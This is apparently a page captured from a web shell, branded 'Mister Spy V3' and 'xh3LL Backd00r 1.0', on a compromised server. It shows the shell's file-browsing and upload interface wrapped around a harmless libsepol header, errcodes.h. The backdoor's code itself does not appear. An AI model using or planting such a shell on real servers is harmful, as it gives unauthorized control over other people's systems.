Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /usr/include/sepol/
Upload File :
Current File : //usr/include/sepol/errcodes.h

/* Author: Karl MacMillan <kmacmillan@mentalrootkit.com> */

#ifndef __sepol_errno_h__
#define __sepol_errno_h__

#include <errno.h>

#ifdef __cplusplus
extern "C" {
#endif

#define SEPOL_OK             0

/* These first error codes are defined for compatibility with
 * previous version of libsepol. In the future, custom error
 * codes that don't map to system error codes should be defined
 * outside of the range of system error codes.
 */
#define SEPOL_ERR            (-1)
#define SEPOL_ENOTSUP        (-2)  /* feature not supported in module language */
#define SEPOL_EREQ           (-3)  /* requirements not met */

/* Error codes that map to system error codes */
#define SEPOL_ENOMEM         (-ENOMEM)
#define SEPOL_EEXIST         (-EEXIST)
#define SEPOL_ENOENT         (-ENOENT)

#ifdef __cplusplus
}
#endif

#endif

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat